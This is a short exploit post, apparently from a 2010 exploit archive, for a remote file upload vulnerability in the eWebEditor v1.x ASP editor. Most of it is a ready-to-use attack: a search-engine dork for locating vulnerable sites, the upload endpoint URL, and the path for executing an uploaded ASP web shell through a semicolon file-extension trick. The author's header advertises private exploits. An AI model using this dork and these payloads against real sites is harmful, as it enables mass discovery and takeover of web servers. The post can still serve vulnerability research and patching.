eWebEditor version 1.x suffers from a shell upload vulnerability.
7dfa476ef03a2a800237e2f8f23684f244f692e8e299196408af88547e41a1d9
=============================================================================
# Tilte: eWebEditor v1.x (WYSIWYG) Remote File Upload .
=============================================================================
#
Date....................: [22-05-2010]# Author..................: [Ma3sTr0-Dz]# Location ...............: [Algeria]# Software ...............: [eWebEditor v1.x (WYSIWYG) Remote File Upload .]# Impact..................: [Remote]# Site Software ..........:
[http://www.ewebeditor.net/]# Sptnx ..................: [CmOs_CLR &
Sec4ever
Memberz.]# Home : .................:
[Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]# Contact me : ...........: [o5m@hotmail.de] #
Vulnerability: Remote File Upload .
#
Part ExplOit & Bug Codes :
------
Dork :
------
allinurl:ewebeditor/asp/
Exploit :
---------
http://site.com/[path]/asp/upload.asp?type=file&style=coolblue&language=zh-cn
http://site.com/uploads/asp/sec4ever.asp;.jpg
-----------------------
Don't Forget : Www.Sec4ever.com/home /// Ur Secure Mind /
_________________________________________________________________
Votre messagerie et bien plus où que vous soyez. Passez à Windows Live Hotmail, c'est gratuit !
https://signup.live.com/signup.aspx?id=60969